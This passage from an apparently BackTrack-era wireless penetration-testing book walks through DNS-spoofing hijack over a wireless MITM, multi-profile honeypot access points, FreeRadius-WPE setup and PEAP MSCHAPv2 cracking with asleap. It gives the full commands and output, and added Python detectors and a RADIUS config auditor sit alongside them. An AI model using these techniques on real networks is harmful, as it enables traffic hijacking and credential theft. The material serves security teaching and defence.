Frame 8: 86 bytes on wire (688 bits), 86 bytes captured (688 bits)
Ethernet II, Src: Alfa_3e:bd:93 (00:c0:ca:3e:bd:93), Dst: IntelCor_35:fc:44 (00:22:fb:35:fc:44)
Internet Protocol, Src: 192.168.0.1 (192.168.0.1), Dst: 192.168.0.197 (192.168.0.197)
User Datagram Protocol, Src Port: domain (53), Dst Port: 52664 (52664)
Domain Name System (response)
    [Request In: 5]
    [Time: 0.007317000 seconds]
    Transaction ID: 0xd51d
    Flags: 0x8180 (Standard query response, No error)
    Questions: 1
    Answer RRs: 1
    Authority RRs: 0
    Additional RRs: 0
    Queries
    Answers
        google.com: type A, class IN, addr 192.168.0.199
            Name: google.com
            Type: A (Host address)
            Class: IN (0x0001)
            Time to live: 1 minute
            Data length: 4
            Addr: 192.168.0.199 (192.168.0.199)
5. On the victim machine, we see an error which says "Connection Refused". This is
because we have made the IP address for google.com 192.168.0.199, which is the
hacker machine's IP, but there is no service listening on port 80:

google.com

Unable to connect

Firefox can't establish a connection to the server at google.com.

- The site could be temporarily unavailable or too busy. Try again in a few moments.
- If you are unable to load any pages, check your computer's network connection.
- If your computer or network is protected by a firewall or proxy, make sure that
  Firefox is permitted to access the Web.

[Try Again]





6. Let us run Apache on BackTrack using the following command: apache2ctl
start:

root@bt:~# apache2ctl start
apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
root@bt:~#








7. Now, once we refresh the browser on the victim, we are greeted with the It works!
default page of Apache:

http://google.com/

It works!
8. This demonstration shows how it is possible to intercept data and send spoofed
responses to hijack sessions on the victim.





What just happened?

We did an application hijacking attack using a wireless MITM as the base. So what happened
behind the scenes? The MITM setup ensured that we were able to see all the packets sent
by the victim. As soon as we saw a DNS request packet coming from the victim, the Dnsspoof
program running on the attacker's laptop sent a DNS response to the victim with the attacker
machine's IP address as that of google.com. The victim's laptop accepts this response and
the browser sends an HTTP request to the attacker's IP address on port 80.

In the first part of the experiment, there was no listening process on port 80 of the attacker's
machine and thus Firefox responded with an error. Then, once we started the Apache server
on the attacker's machine on port 80 (the default port), the browser's request received a
response from the attacker's machine with the default It works! page.

This lab shows us that once we have full control of the lower layers (Layer 2 in this case), it is
easy to hijack applications running on higher layers such as DNS clients and web browsers.
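From the defender's side, the Dnsspoof reply in step 4 leaves two marks that a passive monitor on the segment (or on the client itself) can test for: the response claims the gateway's IP 192.168.0.1 but arrives in a frame whose source MAC is the Alfa card's 00:c0:ca:3e:bd:93 rather than the gateway's 00:21:91:d2:8e:25, and the real resolver's answer for the same transaction ID usually arrives a moment later with a different address. The following Python detector is an added example, not code from the book; the response records are constructed from the fields shown in the screenshots, and the genuine-answer and unrelated-response rows (using TEST-NET addresses) are invented to exercise the second check.

```python
from collections import defaultdict

# Known-good gateway binding for the lab network, as learned from the
# legitimate ARP reply in the captures ("192.168.0.1 is at 00:21:91:d2:8e:25").
GATEWAY_IP = "192.168.0.1"
GATEWAY_MAC = "00:21:91:d2:8e:25"

# Constructed per-frame summaries of DNS responses, carrying the fields a
# dissector exposes: Ethernet source, IP source, the transaction ID that ties
# a response to its query, the name, the answer, and the record TTL (seconds).
SAMPLE_RESPONSES = [
    # Frame 8 from the lab: IP source is the gateway, but the Ethernet source is
    # the attacker's Alfa card and the TTL is one minute. This is the spoof.
    {"frame": 8, "src_mac": "00:c0:ca:3e:bd:93", "src_ip": "192.168.0.1",
     "txid": 0xd51d, "name": "google.com", "addr": "192.168.0.199", "ttl": 60},
    # Constructed: the genuine reply from the real resolver arrives a little
    # later for the same transaction, with a different (TEST-NET) answer.
    {"frame": 11, "src_mac": "00:21:91:d2:8e:25", "src_ip": "192.168.0.1",
     "txid": 0xd51d, "name": "google.com", "addr": "203.0.113.10", "ttl": 250},
    # Constructed: an unrelated, clean response.
    {"frame": 15, "src_mac": "00:21:91:d2:8e:25", "src_ip": "192.168.0.1",
     "txid": 0x1a2b, "name": "example.net", "addr": "198.51.100.7", "ttl": 3600},
]


def mac_mismatch(resp, gateway_ip=GATEWAY_IP, gateway_mac=GATEWAY_MAC):
    """A response that claims the gateway's IP but not its MAC was injected by
    a different host on the segment (dnsspoof sends from the bridge's own card)."""
    return (resp["src_ip"] == gateway_ip
            and resp["src_mac"].lower() != gateway_mac.lower())


def conflicting_answers(responses):
    """Map (txid, name) -> sorted frame numbers for transactions that received
    more than one distinct answer: the spoof races the real reply, so both
    usually reach the client."""
    answers = defaultdict(set)
    frames = defaultdict(list)
    for r in responses:
        key = (r["txid"], r["name"])
        answers[key].add(r["addr"])
        frames[key].append(r["frame"])
    return {k: sorted(frames[k]) for k, v in answers.items() if len(v) > 1}


def detect_spoofed(responses, gateway_ip=GATEWAY_IP, gateway_mac=GATEWAY_MAC):
    """Return {'mac_mismatch': [frames], 'conflicts': {(txid, name): [frames]}}."""
    return {
        "mac_mismatch": [r["frame"] for r in responses
                         if mac_mismatch(r, gateway_ip, gateway_mac)],
        "conflicts": conflicting_answers(responses),
    }


if __name__ == "__main__":
    report = detect_spoofed(SAMPLE_RESPONSES)
    for frame in report["mac_mismatch"]:
        print("frame %d: gateway IP with a non-gateway source MAC" % frame)
    for (txid, name), frames in report["conflicts"].items():
        print("txid 0x%04x for %s answered differently in frames %s"
              % (txid, name, frames))
```

The MAC check depends on a trusted IP-to-MAC binding for the resolver, which a wireless IDS or a DHCP snooping table can provide; the conflicting-answer check needs no prior knowledge and is the one a host-based monitor can run on its own interface.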





The next step in session hijacking using a wireless MITM would be to modify the data being
transmitted by the client. Explore the software available on BackTrack called Ettercap. This will
help you create search-and-replace filters for network traffic.

In this challenge, write a simple filter to replace all occurrences of "security" in the network
traffic with "insecurity". Try searching Google for "security" and check if the results show up for
"insecurity" instead.


Finding security configurations on the client 


In previous chapters, we have seen how to create honeypots for open, WEP-protected, and
WPA access points, but when we are in the field and see Probe Requests from the client,
how do we know which network the probed SSID belongs to?

Though this seems tricky at first, the solution to this problem is simple. We need to
create access points advertising the same SSID but different security configurations
simultaneously. When a roaming client searches for a network, it will automatically
connect to one of these access points based on the network configuration stored on it.


So let the games begin! 
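Seen from the defender's side, the set of access points this section builds has an unmistakable footprint: one SSID beaconing with several incompatible security profiles at the same moment, from BSSIDs that are not on the organization's list. The following Python is an added example, not code from the book; the beacon records and the authorized-BSSID list are constructed (the real lab AP's BSSID and WPA-PSK profile are taken from the airodump-ng output earlier in the chapter, the other BSSIDs are made up), and the function names are this example's own.

```python
from collections import defaultdict

# Constructed beacon observations: (BSSID, SSID, security profile). The profile
# string is what a scanner derives from the beacon's RSN/WPA information
# elements, or from their absence.
OBSERVED_BEACONS = [
    # The lab's real AP, BSSID and profile as airodump-ng reported them earlier.
    ("00:21:91:d2:8e:25", "Wireless Lab", "WPA-PSK"),
    # Four constructed APs advertising the same SSID with one profile each.
    ("00:c0:ca:3e:bd:93", "Wireless Lab", "OPEN"),
    ("00:c0:ca:3e:bd:94", "Wireless Lab", "WEP"),
    ("00:c0:ca:3e:bd:95", "Wireless Lab", "WPA-PSK"),
    ("00:c0:ca:3e:bd:96", "Wireless Lab", "WPA2-PSK"),
    # A normal multi-AP deployment: same SSID, same profile on every BSSID.
    ("00:1a:2b:3c:4d:5e", "Guest", "OPEN"),
    ("00:1a:2b:3c:4d:5f", "Guest", "OPEN"),
]

# Constructed whitelist of authorized BSSIDs per SSID, as a wireless IDS would hold.
AUTHORIZED = {"Wireless Lab": {"00:21:91:d2:8e:25"}}


def profiles_by_ssid(beacons):
    """{ssid: {profile: sorted [bssid, ...]}} with duplicate beacons collapsed."""
    table = defaultdict(lambda: defaultdict(set))
    for bssid, ssid, profile in beacons:
        table[ssid][profile].add(bssid.lower())
    return {ssid: {p: sorted(b) for p, b in profs.items()}
            for ssid, profs in table.items()}


def find_conflicting_ssids(beacons):
    """SSIDs advertised with more than one security profile at the same time.
    One SSID on many BSSIDs is normal (an extended service set); one SSID with
    several incompatible profiles is the footprint of the AP set built here."""
    return {ssid: profs for ssid, profs in profiles_by_ssid(beacons).items()
            if len(profs) > 1}


def find_unauthorized_bssids(beacons, authorized):
    """BSSIDs beaconing an SSID we own that are not on its authorized list."""
    rogue = defaultdict(set)
    for bssid, ssid, _ in beacons:
        if ssid not in authorized:
            continue
        allowed = {a.lower() for a in authorized[ssid]}
        if bssid.lower() not in allowed:
            rogue[ssid].add(bssid.lower())
    return {ssid: sorted(b) for ssid, b in rogue.items()}


if __name__ == "__main__":
    for ssid, profs in find_conflicting_ssids(OBSERVED_BEACONS).items():
        print("SSID %r seen with %d profiles: %s" % (ssid, len(profs), sorted(profs)))
    for ssid, bssids in find_unauthorized_bssids(OBSERVED_BEACONS, AUTHORIZED).items():
        print("SSID %r beaconed by unauthorized BSSIDs: %s" % (ssid, bssids))
```

The same SSID on many BSSIDs with identical profiles is a normal extended service set and must not be alerted on, which is why the Guest rows in the sample are not flagged; the client-side counterpart of this check is to pin each saved profile to its security type and refuse to join a same-named network that offers a weaker one.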


Time for action — enumerating wireless security profiles





1. Wewill assume that the wireless client has a network Wireless Lab configured on 
it and it actively sends Probe Requests for this network, when it is not connected to 
any access point. In order to find the security configuration of this network, we will 
need to create multiple access points. For our discussion, we will assume that the 
client profile is either—an open network, WEP protected, WPA-PSK or WPA2-PSK. 
This would mean we would have to create four access points. To do this we will first 
create four virtual interfaces—monO to mon3 using the ai rmon-ng start wi and 
command multiple times: 


root@bt:~# airmon-ng start wlan0 

Interface       Chipset         Driver 

wlan0           RTL8187         rtl8187 - [phy2] 
                                (monitor mode enabled on mon1) 
mon0            RTL8187         rtl8187 - [phy2] 

root@bt:~# airmon-ng start wlan0 

Interface       Chipset         Driver 

wlan0           RTL8187         rtl8187 - [phy2] 
                                (monitor mode enabled on mon2) 
mon0            RTL8187         rtl8187 - [phy2] 
mon1            RTL8187         rtl8187 - [phy2] 

root@bt:~# airmon-ng start wlan0 

Interface       Chipset         Driver 

wlan0           RTL8187         rtl8187 - [phy2] 
                                (monitor mode enabled on mon3) 
mon0            RTL8187         rtl8187 - [phy2] 
mon1            RTL8187         rtl8187 - [phy2] 
mon2            RTL8187         rtl8187 - [phy2] 





Advanced WLAN Attacks 


2. You can view all these newly created interfaces using the ifconfig -a 
command: 


mon0      Link encap:UNSPEC  HWaddr 00-C0-CA-3E-BD-93-00-00-00-00-00-00-00-00-00-00 
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1 
          RX packets:2111 errors:0 dropped:0 overruns:0 frame:0 
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 
          collisions:0 txqueuelen:1000 
          RX bytes:245105 (245.1 KB)  TX bytes:0 (0.0 B) 

mon1      Link encap:UNSPEC  HWaddr 00-C0-CA-3E-BD-93-00-00-00-00-00-00-00-00-00-00 
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1 
          RX packets:1164 errors:0 dropped:0 overruns:0 frame:0 
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 
          collisions:0 txqueuelen:1000 
          RX bytes:125255 (125.2 KB)  TX bytes:0 (0.0 B) 

mon2      Link encap:UNSPEC  HWaddr 00-C0-CA-3E-BD-93-00-00-00-00-00-00-00-00-00-00 
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1 
          RX packets:1085 errors:0 dropped:0 overruns:0 frame:0 
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 
          collisions:0 txqueuelen:1000 
          RX bytes:116659 (116.6 KB)  TX bytes:0 (0.0 B) 

mon3      Link encap:UNSPEC  HWaddr 00-C0-CA-3E-BD-93-00-00-00-00-00-00-00-00-00-00 
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1 
          RX packets:887 errors:0 dropped:0 overruns:0 frame:0 
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 
          collisions:0 txqueuelen:1000 
          RX bytes:95727 (95.7 KB)  TX bytes:0 (0.0 B) 





3. Now we will create the Open AP on mon0: 


root@bt:~# airbase-ng --essid "Wireless Lab" -a AA:AA:AA:AA:AA:AA -c 3 mon0 
01:56:20 Created tap interface at0 
01:56:20 Trying to set MTU on at0 to 1500 
01:56:21 Access Point with BSSID AA:AA:AA:AA:AA:AA started. 








4. Let's create the WEP-protected AP on mon1: 


root@bt:~# airbase-ng --essid "Wireless Lab" -c 3 -a BB:BB:BB:BB:BB:BB -W 1 mon1 
For information, no action required: Using gettimeofday() instead of /dev/rtc 
01:59:44 Created tap interface at1 
01:59:44 Trying to set MTU on at1 to 1500 
ti_set_mac failed: Cannot assign requested address 
You most probably want to set the MAC of your TAP interface. 
ifconfig <iface> hw ether BB:BB:BB:BB:BB:BB 
01:59:45 Access Point with BSSID BB:BB:BB:BB:BB:BB started. 
5. The WPA-PSK AP will be on mon2: 


root@bt:~# airbase-ng --essid "Wireless Lab" -c 3 -a CC:CC:CC:CC:CC:CC -W 1 -z 2 mon2 
For information, no action required: Using gettimeofday() instead of /dev/rtc 
01:58:48 Created tap interface at2 
01:58:48 Trying to set MTU on at2 to 1500 
01:58:48 Trying to set MTU on mon2 to 1800 
01:58:48 Access Point with BSSID CC:CC:CC:CC:CC:CC started. 





6. The WPA2-PSK AP will be on mon3: 


root@bt:~# airbase-ng --essid "Wireless Lab" -c 3 -a DD:DD:DD:DD:DD:DD -W 1 -Z 2 mon3 
For information, no action required: Using gettimeofday() instead of /dev/rtc 
02:00:31 Created tap interface at3 
02:00:31 Trying to set MTU on at3 to 1500 
02:00:31 Trying to set MTU on mon3 to 1800 
ti_set_mac failed: Cannot assign requested address 
You most probably want to set the MAC of your TAP interface. 
ifconfig <iface> hw ether DD:DD:DD:DD:DD:DD 
02:00:32 Access Point with BSSID DD:DD:DD:DD:DD:DD started. 





7. We can run airodump-ng on the same channel to ensure that all four access points 
are up and running, as shown: 


CH 1 ][ Elapsed: 8 s ][ 2011-06-28 02:00 

BSSID              PWR RXQ  Beacons  ENC   CIPHER  AUTH  ESSID 

AA:AA:AA:AA:AA:AA    0 100      107  OPN                 Wireless Lab 
CC:CC:CC:CC:CC:CC    0 100      107  WPA   TKIP    PSK   Wireless Lab 
DD:DD:DD:DD:DD:DD    0 100      107  WPA2  TKIP    PSK   Wireless Lab 
BB:BB:BB:BB:BB:BB    0 100      107  WEP   WEP           Wireless Lab 





8. Now let's switch the Wi-Fi on, on the roaming client. Depending on which Wireless 
Lab network you had connected it to previously, it will connect to that security 
configuration. In my case, it connects to the WPA-PSK network as shown below. 


root@bt:~# airbase-ng --essid "Wireless Lab" -c 3 -a CC:CC:CC:CC:CC:CC -W 1 -z 2 mon2 
For information, no action required: Using gettimeofday() instead of /dev/rtc 
01:58:48 Created tap interface at2 
01:58:48 Trying to set MTU on at2 to 1500 
01:58:48 Trying to set MTU on mon2 to 1800 
01:58:48 Access Point with BSSID CC:CC:CC:CC:CC:CC started. 
Client C8:BC:C8:EE:12:0B associated (WPA1;TKIP) to ESSID: "Wireless Lab" 
Client C8:BC:C8:EE:12:0B associated (WPA1;TKIP) to ESSID: "Wireless Lab" 
Client C8:BC:C8:EE:12:0B associated (WPA1;TKIP) to ESSID: "Wireless Lab" 
Client C8:BC:C8:EE:12:0B associated (WPA1;TKIP) to ESSID: "Wireless Lab" 
Client C8:BC:C8:EE:12:0B associated (WPA1;TKIP) to ESSID: "Wireless Lab" 
Client C8:BC:C8:EE:12:0B associated (WPA1;TKIP) to ESSID: "Wireless Lab" 








What just happened? 
We created multiple Honeypots with the same SSID but different security configurations. 


Depending on which configuration the client had stored for the Wireless Lab network, it 
connected to the appropriate one. 


This technique can come in handy: if you are doing a penetration test, you would not 
know which security configuration the client has stored on its laptop. This allows you to find 
the appropriate one by setting a bait for the client. This technique is also called WiFishing. 





Have a go hero — baiting clients 


Create different security configurations on the client for the same SSID and check if your set 
of Honeypots is able to detect them. 


It is important to note that many Wi-Fi clients might not actively probe for networks they 
have stored in their profile. It might not be possible to detect these networks using the 
technique we have discussed here. 





Pop quiz — advanced WLAN attacks 


1. In an MITM attack, who is in the middle? 
a. The access point 
b. The attacker 
c. The victim 
d. None of the above 


2. Dnsspoof: 
a. Spoofs DNS requests 
b. Spoofs DNS responses 
c. Needs to run on the DNS server 
d. Needs to run on the access point 


3. A wireless MITM attack can be orchestrated: 
a. On all wireless clients at the same time 
b. Only one channel at a time 
c. On any SSID 
d. Both (b) and (c) 


4. The interface closest to the victim in our MITM setup is: 
a. At0 
b. Eth0 
c. Br0 
d. En0 
Summary 


In this chapter, we have learned how to conduct advanced attacks using wireless as the base. 
We created a setup for a MITM over wireless and then used it to eavesdrop on the victim's 
traffic. We then used the same setup to hijack the application layer of the victim (web traffic 
to be specific) using a DNS poisoning attack. 


In the next chapter, we will learn how to conduct a wireless penetration test right from 
the planning, discovery and attack stages to the reporting stage. We will also touch upon the 
best practices to secure WLANs. 











"The Bigger they are, the Harder they Fall." 


Popular Saying 
WPA-Enterprise has always had an aura of unbreakability around it. Most 
network administrators think of it as a panacea for all their wireless 
security problems. In this chapter, we will see that nothing could be 
further from the truth. 


Here we will learn how to attack WPA-Enterprise using different tools and techniques 
available on BackTrack. 


We will cover the following in the course of this chapter: 


- Setting up FreeRadius-WPE 
- Attacking PEAP on Windows clients 
- Attacking EAP-TTLS 
- Security best practices for Enterprises 


We will need a Radius server for orchestrating WPA-Enterprise attacks. The most widely used 
open source Radius server is FreeRadius. However, setting it up is difficult and configuring it 
for each attack can be tedious. 


Attacking WPA-Enterprise and RADIUS 


Joshua Wright, a well-known security researcher, created a patch for FreeRadius that makes 
it easier to set up and conduct attacks. This patch was released as FreeRadius-WPE 
(Wireless Pwnage Edition). The good news is that this comes pre-installed with BackTrack 
and hence we need not do any installation. 


Let us now first set up the Radius server on BackTrack. 





Time for action — setting up the AP with FreeRadius-WPE 


Follow the given instructions to get started: 


1. Connect one of the LAN ports of the access point to the Ethernet port on your 
machine running BackTrack. In our case, the interface is eth1. Bring up the interface 
and get an IP address by running DHCP as shown in the following screenshot: 


root@bt:~# dhclient3 eth1 
Internet Systems Consortium DHCP Client V3.1.3 
Copyright 2004-2009 Internet Systems Consortium. 
All rights reserved. 
For info, please visit https://www.isc.org/software/dhcp/ 

Listening on LPF/eth1/08:00:27:c6:33:f9 
Sending on   LPF/eth1/08:00:27:c6:33:f9 
Sending on   Socket/fallback 
DHCPDISCOVER on eth1 to 255.255.255.255 port 67 interval 8 
DHCPOFFER of 192.168.0.198 from 192.168.0.1 
DHCPREQUEST of 192.168.0.198 on eth1 to 255.255.255.255 port 67 





2. Log in to the access point and set the Security Mode to WPA-Enterprise. Then, under 
the EAP (802.1x) section, enter the RADIUS server IP Address as 192.168.0.198. This 
is the same IP address allocated to our wired interface in step 1. The RADIUS server 
Shared Secret would be test as shown in the following screenshot: 


WIRELESS SECURITY MODE 

To protect your privacy you can configure wireless security features. This device supports three wireless 
security modes, including WEP, WPA-Personal, and WPA-Enterprise. WEP is the original wireless 
encryption standard. WPA provides a higher level of security. WPA-Personal does not require an 
authentication server. The WPA-Enterprise option requires an external RADIUS server. 

Security Mode: WPA-Enterprise 

Use WPA or WPA2 mode to achieve a balance of strong security and best compatibility. This mode 
uses WPA for legacy clients while maintaining higher security with stations that are WPA2 capable. Also 
the strongest cipher that the client supports will be used. For best security, use WPA2 Only mode. 
This mode uses AES(CCMP) cipher and legacy stations are not allowed access with WPA security. For 
maximum compatibility, use WPA Only. This mode uses TKIP cipher. Some gaming and legacy devices 
work only in this mode. 

To achieve better wireless performance use WPA2 Only security mode (or in other words AES cipher). 

WPA Mode: 
Cipher Type: 
Group Key Update Interval: 3600 (seconds) 

EAP (802.1X) 

When WPA enterprise is enabled, the router uses EAP (802.1x) to authenticate clients via 
a remote RADIUS server. 

Authentication Timeout: 60 (minutes) 
RADIUS server IP Address: 192.168.0.198 
RADIUS server Port: 1812 
RADIUS server Shared Secret: **** 
MAC Address Authentication: 


3. Let us now open a new terminal and go to the directory /usr/local/etc/raddb. 
This is where all the FreeRadius-WPE configuration files are: 


root@bt:/usr/local/etc/raddb# ls 
attrs.access_reject        eap.conf          modules       sites-available  users 
attrs.accounting_response  example.pl        policy.conf   sites-enabled 
clients.conf               huntgroups        proxy.conf    sqlippool.conf 
dictionary                 ldap.attrmap      radiusd.conf  templates.conf 
experimental.conf          policy.txt        sql 
hints                      preproxy_users    sql.conf 
root@bt:/usr/local/etc/raddb# 
4. Open eap.conf; you will find that the default_eap_type is set to peap. Let us 
leave this as it is: 


eap { 
        default_eap_type = peap 
        timer_expire = 60 
        ignore_unknown_eap_types = no 
        cisco_accounting_username_bug = yes 
        md5 { 
        } 
        leap { 
        } 
        gtc { 
                auth_type = PAP 
        } 
        tls { 
                private_key_password = whatever 
                private_key_file = ${raddbdir}/certs/server.pem 
                certificate_file = ${raddbdir}/certs/server.pem 
                CA_file = ${raddbdir}/certs/ca.pem 
                dh_file = ${raddbdir}/certs/dh 
                random_file = ${raddbdir}/certs/random 
                fragment_size = 1024 
                include_length = yes 
        } 
        ttls { 
                default_eap_type = mschapv2 
                #copy_request_to_tunnel = no 
                #use_tunneled_reply = no 
                proxy_tunneled_request_as_eap = yes 
        } 
        mschapv2 { 
        } 





5. Open clients.conf. This is where we define the allowed list of clients that can 
connect to our RADIUS server. As you can interestingly note, the secret for clients in 
the range 192.168.0.0/16 defaults to test. This is exactly what we used in step 2. 


client 192.168.3.4 { 
        secret = testing123 
} 

client 192.168.0.0/16 { 
        secret = test 
        shortname = testAP 
} 

client 172.16.0.0/12 { 
        secret = test 
        shortname = testAP 
} 

client 10.0.0.0/8 { 
        secret = test 
        shortname = testAP 
} 
6. We are now all set to start the Radius server with radiusd -s -X: 


root@bt:/usr/local/etc/raddb# radiusd -s -X 





7. Once you run this, you will see a lot of debug messages on the screen, but 
eventually the server will settle down to listen for requests. Awesome! The setup is 
now ready to start the lab sessions in this chapter: 


 attr_filter attr_filter.accounting_response { 
        attrsfile = "/usr/local/etc/raddb/attrs.accounting_response" 
        key = "%{User-Name}" 
 } 
 Module: Checking session {...} for more modules to load 
 Module: Checking post-proxy {...} for more modules to load 
 Module: Checking post-auth {...} for more modules to load 
 } # modules 
} # server 
radiusd: #### Opening IP addresses and Ports #### 
listen { 
        type = "control" 
        socket = "/usr/local/var/run/radiusd/radiusd.sock" 
} 
Listening on authentication address * port 1812 
Listening on accounting address * port 1813 
Listening on command file /usr/local/var/run/radiusd/radiusd.sock 
Listening on proxy address * port 1814 
Ready to process requests. 





What just happened? 
We have successfully set up FreeRadius-WPE. We will use this in the rest of the experiments 
that we will do in this chapter. 


FreeRadius-WPE has tons of options. It may be a good idea to familiarize yourself with them. 
Most importantly, take time to check out the different configuration files and how they all 
work together. 
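The client definitions in step 5 are exactly what a production deployment most often leaves at sample values: a shared secret of test and client ranges as wide as a /8. The following Python script, added here as an illustration and not code from the book or from FreeRadius-WPE, parses that flat client block layout and reports sample secrets, short secrets and over-broad ranges, running over a constructed copy of the WPE defaults and over a corrected version. The thresholds (16 characters, /24) and the placeholder secret in the corrected block are assumptions of the example.

```python
"""Audit FreeRADIUS clients.conf entries for sample shared secrets and overly
broad client ranges.  Added example, not code from the book or from
FreeRadius-WPE; the parser handles only the flat 'client <addr> { key = value }'
layout shown in step 5, and the thresholds are local-policy assumptions."""
import ipaddress
import re

# Secrets that appear in shipped sample configurations; a NAS entry using one
# of these lets anyone on the range impersonate the AP or the RADIUS server.
SAMPLE_SECRETS = {"test", "testing123", "secret", "radius", "password"}
MIN_SECRET_LEN = 16       # assumption: local policy, not a FreeRADIUS limit
MAX_RANGE_HOSTS = 256     # assumption: anything wider than a /24 is flagged

CLIENT_BLOCK = re.compile(r"client\s+(\S+)\s*\{([^}]*)\}", re.S)


def parse_clients(conf):
    """Return one dict per client block: {'addr': ..., 'secret': ..., ...}."""
    clients = []
    for match in CLIENT_BLOCK.finditer(conf):
        entry = {"addr": match.group(1)}
        for line in match.group(2).splitlines():
            line = line.split("#", 1)[0].strip()     # drop trailing comments
            if "=" in line:
                key, value = (part.strip() for part in line.split("=", 1))
                entry[key] = value
        clients.append(entry)
    return clients


def audit_clients(conf):
    """Return (client_addr, finding) tuples; an empty list means no findings."""
    findings = []
    for client in parse_clients(conf):
        addr, secret = client["addr"], client.get("secret", "")
        if not secret:
            findings.append((addr, "no shared secret configured"))
        elif secret in SAMPLE_SECRETS:
            findings.append((addr, f"sample secret '{secret}' still in use"))
        elif len(secret) < MIN_SECRET_LEN:
            findings.append((addr, f"secret shorter than {MIN_SECRET_LEN} characters"))
        try:
            network = ipaddress.ip_network(addr, strict=False)
        except ValueError:
            continue        # FreeRADIUS also accepts hostnames; not range-checked
        if network.num_addresses > MAX_RANGE_HOSTS:
            findings.append((addr, f"range covers {network.num_addresses} hosts; "
                                   "list the individual AP addresses instead"))
    return findings


# Constructed sample mirroring the WPE defaults shown in step 5.
WEAK_CONF = """
client 192.168.3.4 {
        secret = testing123
}
client 192.168.0.0/16 {
        secret = test
        shortname = testAP
}
client 10.0.0.0/8 {
        secret = test
        shortname = testAP
}
"""

# Corrected form: one block per access point with its own long random secret.
HARDENED_CONF = """
client 192.168.0.1 {
        secret = Kq7vP2xN9mL4wR8tZ3bH6yJ1cF5gD0sA   # placeholder, generate per AP
        shortname = lab-ap-1
        require_message_authenticator = yes
}
"""

if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"[{label}]")
        for addr, finding in audit_clients(conf) or [("-", "no findings")]:
            print(f"  {addr}: {finding}")
```

Run against the WPE defaults the script reports five findings (a sample secret on every block and two ranges far wider than a /24); the corrected file, with one block per AP, produces none.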











Protected Extensible Authentication Protocol (PEAP) is the most popular version of EAP in 
use. This is the EAP mechanism shipped natively with Windows. 


PEAP has two versions: 


1. PEAPv0 with EAP-MSCHAPv2 (most popular as this has native support on Windows) 
2. PEAPv1 with EAP-GTC 


PEAP uses server-side certificates for validation of the Radius server. Almost all attacks on 
PEAP leverage mis-configurations in certificate validation. 


In the next lab, we will look at how to crack PEAP, when certificate validation is turned off on 
the client. 





Time for action - cracking PEAP 


Follow the given instructions to get started: 


1. We double-check the eap.conf file to ensure that PEAP is enabled: 


        timer_expire = 60 
        ignore_unknown_eap_types = no 
        cisco_accounting_username_bug = yes 
        md5 { 
        } 
        leap { 
        } 
        gtc { 
                auth_type = PAP 
        } 
        tls { 
                private_key_password = whatever 
                private_key_file = ${raddbdir}/certs/server.pem 
                certificate_file = ${raddbdir}/certs/server.pem 
                CA_file = ${raddbdir}/certs/ca.pem 
                dh_file = ${raddbdir}/certs/dh 
                random_file = ${raddbdir}/certs/random 
                fragment_size = 1024 
                include_length = yes 
        } 
        ttls { 
                default_eap_type = mschapv2 
                #copy_request_to_tunnel = no 
                #use_tunneled_reply = no 
                #proxy_tunneled_request_as_eap = yes 
        } 
        mschapv2 { 
        } 


2. We then restart the Radius server with radiusd -s -X: 


        attrsfile = "/usr/local/etc/raddb/attrs.accounting_response" 
        key = "%{User-Name}" 
 } 
 Module: Checking session {...} for more modules to load 
 Module: Checking post-proxy {...} for more modules to load 
 Module: Checking post-auth {...} for more modules to load 
 } # modules 
} # server 
radiusd: #### Opening IP addresses and Ports #### 
listen { 
        type = "auth" 
} 
Listening on authentication address * port 1812 
Listening on accounting address * port 1813 
Listening on command file /usr/local/var/run/radiusd/radiusd.sock 
Listening on proxy address * port 1814 
Ready to process requests. 
3. We monitor the log file created by FreeRadius-WPE: 


root@bt:~# tail /usr/local/var/log/radius/freeradius-server-wpe.log -n 0 -f 





4. Windows has native support for PEAP. Let's ensure that Certificate Verification has 
been turned off: 


Protected EAP Properties 

When connecting: 
[ ] Validate server certificate 
    Connect to these servers: 
    Class 3 Public Primary Certification Authority 
    GTE CyberTrust Global Root 
    http://www.valicert.com/ 
    Microsoft Root Authority 
    Microsoft Root Certificate Authority 
    Thawte Timestamping CA 
    Do not prompt user to authorize new servers or trusted certification authorities. 

Select Authentication Method: Secured password (EAP-MSCHAP v2)  [Configure...] 
[x] Enable Fast Reconnect 
[ ] Enforce Network Access Protection 
[ ] Disconnect if server does not present cryptobinding TLV 
[ ] Enable Identity Privacy 


5. We just need to connect to the access point Wireless Lab for Windows to start 
PEAP authentication: 


Currently connected to: 
    Network - Internet access 
    Unidentified network - No network access 

Wireless Network Connection 
    Wireless Lab    Connect automatically    [Connect] 
    Vivek 
    Janet 

Open Network and Sharing Center 


6. Once the client connects to the access point, the client is prompted for a User name 
/ Password. We use SecurityTube as the User name and abcdefghi as the Password: 





Windows Security 
Network Authentication 
Please enter user credentials 
User name: 
Password: 


7. As soon as we do this, we are able to see the MSCHAP-v2 challenge response 
appear in the log file: 


root@bt:~# tail -f /usr/local/var/log/radius/freeradius-server-wpe.log -n 0 
mschap: Tue Aug  2 04:18:54 2011 
        username: SecurityTube 
        challenge: b0:f3:c2:a3:06:0c:94:f5 
        response: b0:c8:dc:06:1f:9d:c2:bc:35:7d:f2:5b:48:2a:99:58:85:10:04:54:98:ca:04:f9 
^C 
root@bt:~# 








8. We now use Asleap to crack this using a password list file that contains the 
password abcdefghi, and we are able to crack the password! 


root@bt:~# tail -f /usr/local/var/log/radius/freeradius-server-wpe.log -n 0 
mschap: Tue Aug  2 04:18:54 2011 
        username: SecurityTube 
        challenge: b0:f3:c2:a3:06:0c:94:f5 
        response: b0:c8:dc:06:1f:9d:c2:bc:35:7d:f2:5b:48:2a:99:58:85:10:04:54:98:ca:04:f9 
^C 
root@bt:~# asleap -C b0:f3:c2:a3:06:0c:94:f5 -R b0:c8:dc:06:1f:9d:c2:bc:35:7d:f2:5b:48:2a:99:58:85:10:04:54:98:ca:04:f9 -W list 
asleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com> 
Using wordlist mode with "list". 
        hash bytes:        9052 
